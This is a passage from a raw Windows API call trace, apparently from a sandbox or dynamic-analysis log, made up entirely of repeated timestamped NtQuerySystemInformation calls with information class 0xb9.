SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd150, Length=0x28, ResultLength=0x0) [0208.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x38, ResultLength=0x0) [0208.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x20, ResultLength=0x0) [0208.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x20, ResultLength=0x0) [0208.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x20, ResultLength=0x0) [0208.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x20, ResultLength=0x0) [0208.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x38, ResultLength=0x0) [0208.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x20, ResultLength=0x0) [0208.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0208.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0208.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd318, Length=0x58, ResultLength=0x0) [0208.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x38, ResultLength=0x0) [0208.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x28, ResultLength=0x0) [0208.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x28, ResultLength=0x0) [0208.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x28, ResultLength=0x0) [0208.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x28, ResultLength=0x0) [0208.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0a0, Length=0x28, ResultLength=0x0) [0208.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x38, ResultLength=0x0) [0208.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x38, ResultLength=0x0) [0208.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd120, Length=0x28, ResultLength=0x0) [0208.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd120, Length=0x28, ResultLength=0x0) [0208.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x38, ResultLength=0x0) [0208.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x38, ResultLength=0x0) [0208.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x20, ResultLength=0x0) [0208.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0208.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0208.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0208.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd160, Length=0x20, ResultLength=0x0) [0208.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x38, ResultLength=0x0) [0208.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd080, Length=0x20, ResultLength=0x0) [0208.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd000, Length=0x20, ResultLength=0x0) [0208.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd000, Length=0x20, ResultLength=0x0) [0208.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd000, Length=0x20, ResultLength=0x0) [0208.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x38, ResultLength=0x0) [0208.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd080, Length=0x20, ResultLength=0x0) [0208.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd000, Length=0x20, ResultLength=0x0) [0208.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd000, Length=0x20, ResultLength=0x0) [0208.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd000, Length=0x20, ResultLength=0x0) [0208.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x38, ResultLength=0x0) [0208.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd080, Length=0x20, ResultLength=0x0) [0208.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x20, ResultLength=0x0) [0208.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x20, ResultLength=0x0) [0208.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd318, Length=0x58, ResultLength=0x0) [0208.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x58, ResultLength=0x0) [0208.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0208.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0208.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0208.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0208.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0208.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfa0, Length=0x28, ResultLength=0x0) [0208.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0208.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x28, ResultLength=0x0) [0208.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x28, ResultLength=0x0) [0208.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0208.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x20, ResultLength=0x0) [0208.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0208.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0208.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0208.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0208.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x20, ResultLength=0x0) [0208.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0208.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0208.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x58, ResultLength=0x0) [0208.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0208.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0208.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0208.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0208.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0208.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfa0, Length=0x28, ResultLength=0x0) [0208.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0208.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x28, ResultLength=0x0) [0208.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x28, ResultLength=0x0) [0208.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0208.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce40, Length=0x20, ResultLength=0x0) [0208.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce40, Length=0x20, ResultLength=0x0) [0208.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce40, Length=0x20, ResultLength=0x0) [0208.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0208.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0208.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x20, ResultLength=0x0) [0208.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0208.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0208.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x58, ResultLength=0x0) [0208.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0208.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0208.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0208.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0208.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0208.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.712] NtQuerySystemInformation 